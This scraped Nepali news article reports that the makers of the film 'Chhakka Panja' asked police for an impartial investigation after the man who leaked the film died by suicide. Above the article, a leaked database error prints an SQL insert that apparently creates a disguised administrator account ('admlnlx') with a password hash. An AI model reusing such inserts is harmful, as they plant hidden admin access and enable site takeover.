WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BV4V4nL3U.l42XH3SRO2TQgazqroke1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 03:07:00', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ ८ –
चलचित्र ‘छक्का पञ्जा’ को निर्माण पक्षले आफूमाथी छानविन गर्न माग गर्दै उजुरी दर्ता गराएको छ । चलचित्र ‘लिक’ भएपछि त्यसमा संलग्न व्यक्तिले आत्महत्या गरेको विषयलाई आफूहरु माथि जोडिएको भन्दै ‘छक्का पञ्जा’ को निर्माण पक्षले घटनाको निष्पक्ष छानवीन गर्न माग गर्दै शनिबार गौशाला प्रहरी प्रभागमा उजुरी दर्ता गरेको हो ।
“हामीले आज निष्पक्ष छानविनको माग गर्दै निवदेन दर्ता गरायौं,” निर्माता निर्मल शर्माले भने,“ विभिन्न सामाजिक सञ्जाल र समाचारमा घटनालाई नबुझी आरोप लगाइएकाले यसमाथि सत्यतथ्य छानविन गर्न माग गरेका हौं ।”
निर्देशक दीपाश्री निरौला र दीपकराज गिरीसहितको टोली पुगेर उजुरी दर्ता गराएको थियो । कलाकार तथा निर्माता गिरीले कल डिटेल समेत लिएर छानविन गर्न सकिने भन्दै आफूहरुले धम्की दिए वा नदिएको स्पष्ट हुने बताए । उनले सुसाइड नोटप्रति पनि आशंका जनाउँदै त्यसको छानविन गर्न पनि माग गरे ।
चलचित्र ‘छक्का पञ्जा’ मा फेसबुकमार्फत लिक गर्ने कृष्ण सुवेदीले आत्म हत्या गरेका थिए । चलचित्र लिक गर्ने सुवेदी सहितका केही व्यक्तिलाई ‘छक्का पञ्जा’ युनिटले पैसा कमाउने नियतले चलचित्र सार्वजनिक गरेको नपाइएको भन्दै प्रहरीबाट मुक्त समेत गराइसकेको थियो ।